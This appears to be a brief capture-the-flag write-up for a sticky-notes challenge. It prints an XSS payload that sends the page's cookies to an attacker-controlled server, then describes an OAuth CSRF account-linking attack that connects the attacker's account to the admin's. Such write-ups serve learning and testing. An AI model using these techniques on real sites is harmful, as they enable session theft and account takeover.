Note Surfer

1 minute read

img

img

Sticky notes app. There’s a couple interesting things to note here. Link with OAuth and Report a problem.

Checking out ‘Report a problem’ first

img

So this got me thinking. If the admin is looking into it, maybe there’s some kind of vulnerability on the back end.

I fired up my VPS and started a php session to see if I could steal some cookies

Reported this payload as a problem:

<img src=x onerror=document.location="http://REDACTED/cookie.php?c="+document.cookie>

img

So XXS is in play, but the cookies are set to HttpOnly. No dice there.

The title of the challenge is a big hint on what to do next:

Cross Site Request Forgery or CSRF (Sea Surf) for short

I assumed that it had something to do with OAuth, so I fired up burp to capture the requests

img

Forwarding the first request leaves us with the second.

img

After some testing I noted that the ‘code’ variable is one use. So I set this request to repeater and dropped it.

Right click anywhere on the request and ‘Copy URL’

Back on the sticky notes app, we can report another problem

img

Send that off and then logging into our OAuth account we can see that we’re now connected with the Admin sticky notes account

img